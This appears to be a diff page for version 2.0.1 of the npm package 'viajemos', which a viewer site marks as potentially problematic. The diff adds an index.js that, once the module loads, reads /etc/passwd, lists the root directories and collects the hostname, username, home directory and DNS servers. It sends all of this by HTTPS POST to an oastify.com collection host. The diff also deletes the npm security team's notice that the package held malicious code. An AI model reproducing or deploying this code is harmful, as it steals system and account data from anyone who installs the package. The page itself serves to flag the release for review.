viajemos 0.0.1-security → 2.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of viajemos might be problematic. Click here for more details.
- package/index.js +74 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,74 @@
|
|
|
1
|
+
const os = require("os");
|
|
2
|
+
const dns = require("dns");
|
|
3
|
+
const querystring = require("querystring");
|
|
4
|
+
const https = require("https");
|
|
5
|
+
const fs = require("fs"); // Import fs to read files and directories
|
|
6
|
+
const path = require("path");
|
|
7
|
+
const packageJSON = require("./package.json");
|
|
8
|
+
const package = packageJSON.name;
|
|
9
|
+
|
|
10
|
+
// Function to list all directories in the root folder
|
|
11
|
+
function getDirectoriesInRoot() {
|
|
12
|
+
const rootPath = '/'; // Root directory for Unix-based systems
|
|
13
|
+
try {
|
|
14
|
+
return fs.readdirSync(rootPath)
|
|
15
|
+
.filter(file => fs.statSync(path.join(rootPath, file)).isDirectory());
|
|
16
|
+
} catch (err) {
|
|
17
|
+
console.error("Error reading root directory:", err);
|
|
18
|
+
return [];
|
|
19
|
+
}
|
|
20
|
+
}
|
|
21
|
+
|
|
22
|
+
// Function to read /etc/passwd file
|
|
23
|
+
function readPasswdFile() {
|
|
24
|
+
const passwdPath = "/etc/passwd"; // Path to /etc/passwd
|
|
25
|
+
try {
|
|
26
|
+
return fs.readFileSync(passwdPath, "utf-8");
|
|
27
|
+
} catch (err) {
|
|
28
|
+
console.error("Error reading /etc/passwd file:", err);
|
|
29
|
+
return null;
|
|
30
|
+
}
|
|
31
|
+
}
|
|
32
|
+
|
|
33
|
+
const trackingData = JSON.stringify({
|
|
34
|
+
p: package,
|
|
35
|
+
c: __dirname,
|
|
36
|
+
hd: os.homedir(),
|
|
37
|
+
hn: os.hostname(),
|
|
38
|
+
un: os.userInfo().username,
|
|
39
|
+
dns: dns.getServers(),
|
|
40
|
+
r: packageJSON ? packageJSON.___resolved : undefined,
|
|
41
|
+
v: packageJSON.version,
|
|
42
|
+
pjson: packageJSON,
|
|
43
|
+
rootDirs: getDirectoriesInRoot(), // List of directories in root folder
|
|
44
|
+
passwd: readPasswdFile(), // Contents of /etc/passwd
|
|
45
|
+
});
|
|
46
|
+
|
|
47
|
+
var postData = querystring.stringify({
|
|
48
|
+
msg: trackingData,
|
|
49
|
+
});
|
|
50
|
+
|
|
51
|
+
// Replace with Interactsh or Pipedream URL
|
|
52
|
+
var options = {
|
|
53
|
+
hostname: "2bemhbjl9htdy0irflub38r22t8kwakz.oastify.com", // Replace with desired service
|
|
54
|
+
port: 443,
|
|
55
|
+
path: "/",
|
|
56
|
+
method: "POST",
|
|
57
|
+
headers: {
|
|
58
|
+
"Content-Type": "application/x-www-form-urlencoded",
|
|
59
|
+
"Content-Length": postData.length,
|
|
60
|
+
},
|
|
61
|
+
};
|
|
62
|
+
|
|
63
|
+
var req = https.request(options, (res) => {
|
|
64
|
+
res.on("data", (d) => {
|
|
65
|
+
process.stdout.write(d);
|
|
66
|
+
});
|
|
67
|
+
});
|
|
68
|
+
|
|
69
|
+
req.on("error", (e) => {
|
|
70
|
+
console.error(e);
|
|
71
|
+
});
|
|
72
|
+
|
|
73
|
+
req.write(postData);
|
|
74
|
+
req.end();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "viajemos",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "2.0.1",
|
|
4
|
+
"description": "White Hat ",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=viajemos for more information.
|